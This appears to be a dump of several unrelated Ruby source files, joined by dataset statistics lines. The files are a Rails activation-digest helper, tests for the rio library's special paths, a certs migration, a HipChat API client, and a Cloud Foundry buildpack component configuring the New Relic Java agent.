# Creates the activation token and digest, assigning the digest derived from the token
# Created for new users
def create_activation_digest
self.activation_token = User.new_token
self.activation_digest = User.digest(activation_token)
end
end
| 28.819048 | 78 | 0.737277 |
915f61c80048628d81b14223518a566ae1da3bb0 | 4,735 | #!/usr/local/bin/ruby
if $0 == __FILE__
Dir.chdir File.dirname(__FILE__)+'/../'
$:.unshift File.expand_path('../lib/')
end
require 'rio'
require 'tc/testcase'
require 'tmpdir'
class TC_riorl < Test::RIO::TestCase
@@once = false
def self.once
@@once = true
end
def setup
super
self.class.once unless @@once
@tmpdir = "#{::Dir::tmpdir}"
#p @tmpdir
@tmppath = "#{@tmpdir}/rio"
end
def pathinfo(ario)
h = {}
[:scheme,:opaque,:path,:fspath,:to_s,:to_url,:to_uri].each do |sym|
begin
h[sym] = ario.__send__(sym)
rescue
h[sym] = 'error'
end
end
h
end
def pinfo(fmt,pi)
printf(fmt, pi[:scheme].inspect,pi[:opaque].inspect,pi[:path].inspect,
pi[:fspath].inspect,pi[:to_s].inspect,pi[:to_url].inspect)
end
def mkrioinfo(astring)
rinfo = mksyminfo(astring)
rinfo[?-] = rinfo[:stdio]
rinfo[?=] = rinfo[:stderr]
rinfo[??] = rinfo[:temp]
rinfo[?"] = rinfo[:strio]
rinfo[?_] = rinfo[:sysio]
rinfo[?`] = rinfo[:cmdio]
rinfo[?#] = rinfo[:fd]
rinfo
end
def mksyminfo(astring)
rinfo = {
:stdio => ['stdio',"",nil,nil,"stdio:","stdio:"],
:stderr => ['stderr',"",nil,nil,"stderr:","stderr:"],
:temp => ['temp',@tmppath,nil,nil,"temp:#{@tmppath}","temp:#{@tmppath}"],
}
strpq = sprintf("0x%08x",astring.object_id)
rinfo[:strio] = ['strio',strpq,nil,nil,"strio:#{strpq}","strio:#{strpq}"]
siopq = sprintf("0x%08x",$stdout.object_id)
rinfo[:sysio] = ['sysio',siopq,nil,nil,"sysio:#{siopq}","sysio:#{siopq}"]
rinfo[:cmdio] = ['cmdio','echo%20x',nil,nil,'echo x','cmdio:echo%20x']
rinfo[:fd] = ['fd','1',nil,nil,'fd:1','fd:1']
rinfo
end
def mkrios1()
rinfo = mkrioinfo(astring="")
rios = {
?- => rio(?-),
?= => rio(?=),
?" => rio(?",astring),
?? => rio(??),
?_ => rio($stdout),
?` => rio(?`,'echo x'),
?# => rio(?#,1),
}
[rios,rinfo]
end
def mkrios_sym
rinfo = mksyminfo(astring="")
rios = {
:stdio => rio(:stdio),
:stderr => rio(:stderr),
:strio => rio(:strio,astring),
:temp => rio(:temp),
:sysio => rio(:sysio,$stdout),
:cmdio => rio(:cmdio,'echo x'),
:fd => rio(:fd,1),
}
[rios,rinfo]
end
def mkrios_modfunc
rinfo = mksyminfo(astring="")
rios = {
:stdio => RIO.stdio,
:stderr => RIO.stderr,
:strio => RIO.strio(astring),
:temp => RIO.temp,
:sysio => RIO.sysio($stdout),
:cmdio => RIO.cmdio('echo x'),
:fd => RIO.fd(1),
}
[rios,rinfo]
end
def mkrios_classmeth
rinfo = mksyminfo(astring="")
rios = {
:stdio => RIO::Rio.stdio,
:stderr => RIO::Rio.stderr,
:strio => RIO::Rio.strio(astring),
:temp => RIO::Rio.temp,
:sysio => RIO::Rio.sysio($stdout),
:cmdio => RIO::Rio.cmdio('echo x'),
:fd => RIO::Rio.fd(1),
}
[rios,rinfo]
end
def check_rios(rios,rinfo,fmt="%-12s %-12s %-8s %-8s %-20s %-20s\n")
#printf(fmt,'scheme','opaque','path','fspath','to_s','url')
rios.each do |k,r|
#pinfo(fmt,pathinfo(r))
assert_equal(rinfo[k][0],r.scheme)
assert_equal(rinfo[k][1],r.opaque)
assert_equal(rinfo[k][2],r.path)
assert_equal(rinfo[k][3],r.fspath)
assert_equal(rinfo[k][4],r.to_s)
assert_equal(rinfo[k][5],r.to_url)
end
end
def test_specialpaths
rios,rinfo = mkrios1()
check_rios(rios,rinfo)
end
def test_specialpaths_sym
rios,rinfo = mkrios_sym()
check_rios(rios,rinfo)
end
def test_specialpaths_modfunc
rios,rinfo = mkrios_modfunc()
check_rios(rios,rinfo)
end
def test_specialpaths_classmeth
rios,rinfo = mkrios_classmeth()
check_rios(rios,rinfo)
end
def mkrios_open()
require 'tempfile'
stdlib_temppath = ::Tempfile.new('rio').path
fnre = "#{@tmppath}(\\.)?\\d+.\\d+"
rinfo = {
?- => ['stdout',/^$/,nil,nil,/^stdout:$/,/^stdout:$/],
?? => ['file',%r|//#{fnre}|,%r|#{fnre}|,%r|#{fnre}|,/#{fnre}/,/#{fnre}/],
}
siopq = sprintf("0x%08x",$stdout.object_id)
rios = {
?- => rio(?-).print("."),
?? => rio(??).puts("hw"),
}
[rios,rinfo]
end
def test_specialpaths_open
fmt = "%-12s %-12s %-8s %-8s %-20s %-20s\n"
#printf(fmt,'scheme','opaque','path','fspath','to_s','url')
rios,rinfo = mkrios_open()
rios.each do |k,r|
#pinfo(fmt,pathinfo(r))
assert_equal(rinfo[k][0],r.scheme)
assert_match(rinfo[k][1],r.opaque)
assert_match(rinfo[k][4],r.to_s)
assert_match(rinfo[k][5],r.to_url)
end
assert_match(rinfo[??][2],rios[??].path)
assert_match(rinfo[??][3],rios[??].fspath)
end
end
| 26.016484 | 79 | 0.549102 |
1120581a74718321e844568c2d3381b548bff862 | 157 | class CreateCerts < ActiveRecord::Migration
def change
create_table :certs do |t|
t.string :cert_name
t.string :exp_date
end
end
end
| 17.444444 | 43 | 0.675159 |
e8f22852015f4222e679c4bec0f3cae67b71e2d5 | 3,598 | module HipChat
class Client
include HTTParty
format :json
def initialize(token, options={})
@token = token
default_options = { api_version: 'v1', server_url: 'https://api.hipchat.com' }
@options = default_options.merge options
@api_version = options[:api_version]
@api = HipChat::ApiVersion::Client.new(@options)
self.class.base_uri(@api.base_uri)
http_proxy = options[:http_proxy] || ENV['http_proxy']
setup_proxy(http_proxy) if http_proxy
end
def rooms
@rooms ||= _rooms
end
def [](name)
HipChat::Room.new(@token, { room_id: name, :api_version => @api_version, :server_url => @options[:server_url] })
end
def create_room(name, options={})
if @api.version == 'v1' && options[:owner_user_id].nil?
raise RoomMissingOwnerUserId, 'V1 API Requires owner_user_id'
end
if name.length > 50
raise RoomNameTooLong, "Room name #{name} is #{name.length} characters long. Limit is 50."
end
unless options[:guest_access].nil?
options[:guest_access] = @api.bool_val(options[:guest_access])
end
response = self.class.post(@api.create_room_config[:url],
:query => { :auth_token => @token },
:body => {
:name => name
}.merge(options).send(@api.create_room_config[:body_format]),
:headers => @api.headers
)
case response.code
when 201, 200 #CREATED
response.parsed_response
when 400
raise UnknownRoom, "Error: #{response.message}"
when 401
raise Unauthorized, 'Access denied'
else
raise UnknownResponseCode, "Unexpected error #{response.code}"
end
end
def user(name)
HipChat::User.new(@token, { :user_id => name, :api_version => @api_version, :server_url => @options[:server_url] })
end
def users
@users ||= _users
end
private
def no_proxy?
host = URI.parse(@options[:server_url]).host
ENV.fetch('no_proxy','').split(',').any? do |pattern|
# convert patterns like `*.example.com` into `.*\.example\.com`
host =~ Regexp.new(pattern.gsub(/\./,'\\.').gsub(/\*/,'.*'))
end
end
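# Illustrative example (hypothetical values): with ENV['no_proxy'] set to
# 'localhost,*.example.com' and a server_url of https://hipchat.example.com,
# the '*.example.com' pattern becomes /.*\.example\.com/ and matches the host,
# so no proxy is configured.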
def setup_proxy(proxy_url)
return if no_proxy?
proxy_url = URI.parse(proxy_url)
self.class.http_proxy(proxy_url.host, proxy_url.port,
proxy_url.user, proxy_url.password)
HipChat::Room.http_proxy(proxy_url.host, proxy_url.port,
proxy_url.user, proxy_url.password)
end
def _rooms
response = self.class.get(@api.rooms_config[:url],
:query => {
:auth_token => @token
},
:headers => @api.headers
)
case response.code
when 200
response[@api.rooms_config[:data_key]].map do |r|
HipChat::Room.new(@token, r.merge(:api_version => @api_version, :server_url => @options[:server_url]))
end
else
raise UnknownResponseCode, "Unexpected #{response.code} for room"
end
end
def _users
response = self.class.get(@api.users_config[:url],
:query => {
:auth_token => @token,
:expand => 'items'
},
:headers => @api.headers
)
case response.code
when 200
response[@api.users_config[:data_key]].map do |u|
HipChat::User.new(@token, u.merge(:api_version => @api_version))
end
else
raise UnknownResponseCode, "Unexpected #{response.code} for user"
end
end
end
end
| 29.016129 | 121 | 0.59144 |
1a4039ce50e4fc766673e609e5c22c1dde659ce9 | 2,795 | # Encoding: utf-8
# Cloud Foundry Java Buildpack
# Copyright 2013-2017 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'java_buildpack/component/versioned_dependency_component'
require 'java_buildpack/framework'
module JavaBuildpack
module Framework
# Encapsulates the functionality for enabling zero-touch New Relic support.
class NewRelicAgent < JavaBuildpack::Component::VersionedDependencyComponent
# (see JavaBuildpack::Component::BaseComponent#compile)
def compile
download_jar
@droplet.copy_resources
end
# (see JavaBuildpack::Component::BaseComponent#release)
def release
credentials = @application.services.find_service(FILTER)['credentials']
java_opts = @droplet.java_opts
configuration = {}
apply_configuration(credentials, configuration)
apply_user_configuration(credentials, configuration)
write_java_opts(java_opts, configuration)
java_opts.add_javaagent(@droplet.sandbox + jar_name)
.add_system_property('newrelic.home', @droplet.sandbox)
java_opts.add_system_property('newrelic.enable.java.8', 'true') if @droplet.java_home.java_8_or_later?
end
protected
# (see JavaBuildpack::Component::VersionedDependencyComponent#supports?)
def supports?
@application.services.one_service? FILTER, [LICENSE_KEY, LICENSE_KEY_USER]
end
private
FILTER = /newrelic/
LICENSE_KEY = 'licenseKey'.freeze
LICENSE_KEY_USER = 'license_key'.freeze
private_constant :FILTER, :LICENSE_KEY, :LICENSE_KEY_USER
def apply_configuration(credentials, configuration)
configuration['log_file_name'] = 'STDOUT'
configuration[LICENSE_KEY_USER] = credentials[LICENSE_KEY]
configuration['app_name'] = @application.details['application_name']
end
def apply_user_configuration(credentials, configuration)
credentials.each do |key, value|
configuration[key] = value
end
end
def write_java_opts(java_opts, configuration)
configuration.each do |key, value|
java_opts.add_system_property("newrelic.config.#{key}", value)
end
end
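# Illustrative result (hypothetical credential values): a bound service with
# licenseKey 'abc123' for an application named 'my-app' yields, in addition to
# the -javaagent and newrelic.home flags added in release:
#
#   -Dnewrelic.config.log_file_name=STDOUT
#   -Dnewrelic.config.license_key=abc123
#   -Dnewrelic.config.app_name=my-app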
end
end
end
| 32.5 | 110 | 0.71449 |